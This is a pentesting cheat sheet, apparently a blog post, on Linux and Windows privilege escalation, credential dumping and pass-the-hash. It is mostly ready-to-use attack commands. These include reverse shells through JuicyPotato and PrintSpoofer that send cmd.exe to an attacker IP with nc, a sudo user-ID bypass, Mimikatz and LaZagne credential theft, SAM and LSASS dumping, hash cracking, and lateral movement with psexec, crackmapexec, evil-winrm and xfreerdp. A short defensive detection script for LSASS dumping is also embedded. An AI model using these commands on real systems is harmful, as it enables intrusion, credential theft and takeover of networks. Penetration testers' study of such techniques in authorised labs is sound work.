
Pentesting - Privilege Escalation

Interesting commands

Displays the user and group identity associated with the current user, providing information such as user ID (UID), group ID (GID), and supplementary group memberships:

id

Displays a list of previously executed commands in the terminal session:

history

Allows a user with administrative privileges to switch to the root user, effectively gaining superuser (root) access:

sudo su

To list which commands the current user is allowed to run with sudo (and as which users):

sudo -l

To find SUID files under the current directory:

find . -perm /4000

Another way, searching the whole filesystem for regular files only:

find / -perm -u=s -type f 2>/dev/null

Find directories writable by the current user:

find / -writable -type d 2>/dev/null

Listening TCP/UDP ports and the processes that own them:

netstat -tulpn

Processes running as root:

ps aux | grep root

Running kernel version:

uname -a

Interesting Tools

GTFOBins

This page contains a list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.

GTFOBins is a community-driven project that provides a curated list of Unix/Linux commands and binaries that can be used for privilege escalation, bypassing security restrictions, or performing other useful operations. Before using any information from GTFOBins, check the current user's UID and group memberships (with id) to ensure the command is applicable and safe in the given context.

PEAS (Windows and Linux) - LinPEAS and WinPEAS

  • https://github.com/carlospolop/PEASS-ng

Metasploit - Exploit suggester

msf > use post/multi/recon/local_exploit_suggester

Impersonate the access token of a process running with higher privileges, e.g. SYSTEM (in a Meterpreter session on Windows):

meterpreter > steal_token <ID-process>

Dumping hashes in a Meterpreter session (load the kiwi extension first):

meterpreter > load kiwi
meterpreter > hashdump
meterpreter > lsa_dump_sam
meterpreter > lsa_dump_secrets

Bash privilege escalation via the sudo user-ID bypass (only on unpatched sudo versions, when the sudoers rule lets the user run the command as any user except root):

sudo -u#-1 /bin/bash

Windows

Windows enumeration

net config Workstation
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
hostname
net users
ipconfig /all
route print
systeminfo
arp -A
netstat -ano
netsh firewall show state
netsh firewall show config
schtasks /query /fo LIST /v
tasklist /SVC
net start
DRIVERQUERY
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
dir /s *pass* == *cred* == *vnc* == *.config*
findstr /si password *.xml *.ini *.txt
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

In Windows, the 'type' command is used instead of 'cat' to view the contents of a file.

Logged-In Users

query user

Current user

echo %USERNAME%

Current User Privileges

whoami /priv

Current User Group Information

whoami /groups

Get All Users

net user

Get All Groups

net localgroup

Get Password Policy & Other Account Information

net accounts

Check which process/application is using a particular port on Windows

netstat -aon | findstr <port>

Note the PID in the last column, then look it up in the output of "tasklist /svc".

Windows privesc

  • OSCP-notes
  • Hacktricks

MSF - Dumping Hashes (NTLM password hash)

meterpreter > lsa_dump_sam

Interesting tools

  • PsExec
  • Mimikatz

Privilege escalation - SeImpersonate

  • With JuicyPotato:

First, authenticate to MSSQL as a user (Impacket's mssqlclient.py):

mssqlclient.py <user>@<IP> -windows-auth

Enabling xp_cmdshell:

enable_xp_cmdshell

Confirm that it works:

xp_cmdshell whoami /priv

Escalating privileges using JuicyPotato, example:

xp_cmdshell c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.14.3 8443 -e cmd.exe" -t *

On the attacker's machine, start the listener:

sudo nc -lnvp 8443

  • With PrintSpoofer:

Example:

xp_cmdshell c:\tools\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.14.3 8443 -e cmd"

On the attacker's machine, start the listener:

sudo nc -lnvp 8443

Privilege escalation - SeDebugPrivilege

Example:

procdump.exe -accepteula -ma lsass.exe lsass.dmp

If this succeeds, the dump can be loaded in Mimikatz using the sekurlsa::minidump command. After issuing the sekurlsa::logonPasswords command, we obtain the NTLM hash of the local administrator account logged on locally. This can be used for a pass-the-hash attack to move laterally if the same local administrator password is reused on one or more additional systems (common in large organizations).

Credential Hunting in Windows

The tool LaZagne is used to discover credentials that web browsers or other installed applications may store insecurely.

start lazagne.exe all

Find patterns with findstr

Example:

C:\> findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml

Attacking SAM and LSASS

  • Using reg.exe to copy the registry hives:

reg.exe save hklm\sam C:\sam.save
reg.exe save hklm\system C:\system.save
reg.exe save hklm\security C:\security.save

Then, these files must be transferred to the attacker’s system.

  • Dumping hashes with Impacket's secretsdump.py, example:

python3 /<path>/secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

The NT hashes can then be cracked with John or Hashcat:

sudo hashcat -m 1000 <fileHash> <pathWordlist>

or:

john hash --format=NT --wordlist=<pathWordlist>

  • Dumping LSA secrets remotely:

crackmapexec smb <victim-IP> --local-auth -u <user> -p <password> --lsa

  • Dumping SAM remotely:

crackmapexec smb <victim-IP> --local-auth -u <user> -p <password> --sam
  • Obtain an LSASS dump from Task Manager

Run Task Manager, find the Local Security Authority Process, right-click it and choose "Create dump file"; the resulting dump can then be analysed with tools such as Mimikatz.
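Detection for the LSASS dumping (procdump, Task Manager) and hive copying (reg.exe save) described above, as an added example that is not from the original post: it walks constructed Sysmon-style ProcessAccess (Event ID 10) and ProcessCreate (Event ID 1) records, flags any non-allowlisted image that opens lsass.exe with PROCESS_VM_READ (0x0010 in GrantedAccess), and flags reg.exe saving the SAM, SECURITY or SYSTEM hives. The field names follow Sysmon; the allowlist and the log records are constructed for the example.

```python
import re

PROCESS_VM_READ = 0x0010  # access right needed to read another process's memory

# Illustrative allowlist of system images that legitimately open lsass.exe;
# a real deployment tunes this per environment.
KNOWN_LSASS_READERS = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
}

# reg.exe save against the SAM, SECURITY or SYSTEM hives (as in the commands above)
HIVE_SAVE_RE = re.compile(
    r"\breg(?:\.exe)?\s+save\s+hklm\\(sam|security|system)\b", re.IGNORECASE)

# Constructed sample events in Sysmon field naming (not real logs):
# id 10 = ProcessAccess, id 1 = ProcessCreate.
SAMPLE_EVENTS = [
    {"id": 10, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1410"},
    {"id": 10, "SourceImage": r"C:\tools\procdump.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"id": 10, "SourceImage": r"C:\Windows\System32\Taskmgr.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1410"},
    {"id": 10, "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
    {"id": 1, "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg.exe save hklm\sam C:\sam.save"},
    {"id": 1, "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion"},
]


def analyse(events):
    """Return (kind, image, detail) tuples for events matching the two patterns."""
    findings = []
    for ev in events:
        if ev["id"] == 10 and ev["TargetImage"].lower().endswith(r"\lsass.exe"):
            mask = int(ev["GrantedAccess"], 16)
            src = ev["SourceImage"].lower()
            # reading lsass memory from a non-allowlisted image: likely credential dumping
            if mask & PROCESS_VM_READ and src not in KNOWN_LSASS_READERS:
                findings.append(("lsass_read", ev["SourceImage"], ev["GrantedAccess"]))
        elif ev["id"] == 1:
            m = HIVE_SAVE_RE.search(ev["CommandLine"])
            if m:
                findings.append(("hive_save", ev["Image"], m.group(1).lower()))
    return findings


if __name__ == "__main__":
    for finding in analyse(SAMPLE_EVENTS):
        print(finding)
```

The svchost record is not flagged because 0x1000 (PROCESS_QUERY_LIMITED_INFORMATION) does not include the memory-read right, which is why the mask check matters more than the mere presence of an lsass.exe access event.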

Tools for analysing Windows files

MSG and EML files

Free Online .MSG and .EML Viewer

EVTX file

Download: https://github.com/omerbenamram/evtx

sudo apt install cargo
cargo install evtx

Convert the EVTX file to JSON:

/root/.cargo/bin/evtx_dump -f <output> -o json <file.evtx>

Pass The Hash (PtH)

Interesting Tools

Mimikatz

Obtaining Hashes:

mimikatz # privilege::debug
mimikatz # token::elevate
mimikatz # sekurlsa::logonpasswords

Obtaining SAM:

privilege::debug
token::elevate
lsadump::sam

Pass the hash:

mimikatz # privilege::debug
mimikatz # token::elevate
mimikatz # sekurlsa::pth /user:<username> /ntlm:<hash>

Dump Memory

Interesting Tools

LaZagne

lazagne.exe all

Download: https://github.com/AlessandroZ/LaZagne/releases

Linux

Pass The Hash (PtH)

Interesting Tools

Impacket PsExec

Syntax:

impacket-psexec <username>@<IP> -hashes :<hash>

Example:

impacket-psexec administrator@10.129.201.126 -hashes :30B3783CE2ABF1AF70F77D0660CF3453

CrackMapExec

Syntax:

crackmapexec <protocol> <IP> -u <username> -d <domain> -H <hash>

Example:

crackmapexec smb 172.16.1.0/24 -u Administrator -d . -H 30B3783CE2ABF1AF70F77D0660CF3453

Evil-winrm

Syntax:

evil-winrm -i <IP> -u <username> -H <hash>

Example:

evil-winrm -i 10.129.201.126 -u Administrator -H 30B3783CE2ABF1AF70F77D0660CF3453

RDP

Enable Restricted Admin mode by adding the registry value (required before RDP pass-the-hash works):

c:\tools> reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

Syntax:

xfreerdp /v:<IP> /u:<username> /pth:<hash>

Example:

xfreerdp /v:10.129.201.126 /u:julio /pth:64F12CDDAA88057E06A81B54E73B949B

Dump Memory

Interesting Tools

LaZagne

python2.7 laZagne.py all

This post is licensed under CC BY 4.0 by the author.